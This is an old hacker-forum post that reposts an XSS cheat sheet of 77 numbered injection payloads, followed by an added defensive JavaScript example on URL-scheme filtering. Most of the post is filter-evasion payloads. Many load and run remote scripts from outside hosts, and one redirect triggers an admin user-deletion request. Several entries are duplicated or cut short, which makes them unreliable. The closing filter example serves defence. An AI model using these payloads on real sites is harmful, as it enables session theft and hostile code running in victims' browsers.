XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Corrected malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters are basically ineffective in China, since there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta chars in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) JavaScript with escape filtering
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
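As an added example (not part of the original post or the cheat sheet it copies), the JavaScript below shows why a filter that only looks for the literal string javascript: misses the IMG SRC variants in entries (4), (10), (11)-(14), (17) and (19), and how normalizing the value the way a browser's URL parser would, then allowlisting the scheme, rejects all of them while still passing an ordinary image URL. The sample values are constructed from those entries; all function and variable names are the example's own.

```javascript
// Added example (not from the original post): a literal "javascript:" blacklist versus a
// normalize-then-allowlist check, run over IMG SRC values constructed from the entries above.
const ALLOWED_SCHEMES = ["http", "https"];

// Decode numeric character references, including the semicolon-less forms
// of entries (9) and (10). Named entities are out of scope for this example.
function decodeNumericEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// See the value the way a browser's URL parser will: entities decoded, tab/LF/CR
// removed anywhere (entries 11-14), NUL removed (17), leading controls and spaces
// dropped (19). Filtering the raw string instead is what each of those entries defeats.
function normalizeUrl(raw) {
  return decodeNumericEntities(raw)
    .replace(/[\t\n\r\x00]/g, "")
    .replace(/^[\x01-\x20]+/, "");
}

// The weak check: a case-sensitive substring match on the raw, undecoded value.
function naiveBlocks(raw) {
  return raw.includes("javascript:");
}

// The stronger check: parse the scheme from the normalized value and allowlist it.
// A colon before the first "/" that does not form a valid scheme is treated as an
// unparsed scheme and rejected rather than passed through as a relative URL.
function allowlistAccepts(raw) {
  const s = normalizeUrl(raw).toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(s);
  if (m) return ALLOWED_SCHEMES.includes(m[1]);
  const slash = s.indexOf("/"), colon = s.indexOf(":");
  return colon === -1 || (slash !== -1 && slash < colon);
}

// Constructed samples modelled on the cheat-sheet entries (the hex sample encodes
// only the scheme; entry (10) encodes the whole value).
const SAMPLES = {
  mixedCase:    "JaVaScRiPt:alert('XSS')",                                              // (4)
  hexNoSemi:    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", // (10)
  embeddedTab:  "jav\tascript:alert('XSS');",                                           // (11)
  embeddedCr:   "jav\rascript:alert('XSS');",                                           // (14)
  nulByte:      "java\0script:alert('XSS')",                                            // (17)
  leadingSpace: " javascript:alert('XSS');",                                            // (19)
  benign:       "http://example.com/a.png",                                             // ordinary image
  schemeLess:   "//example.com/a.png",                                                  // (74)
};
```

Of the samples, only the leading-space one contains the literal substring the naive check looks for; every other variant passes it untouched, while the allowlist rejects all six and accepts the two benign URLs.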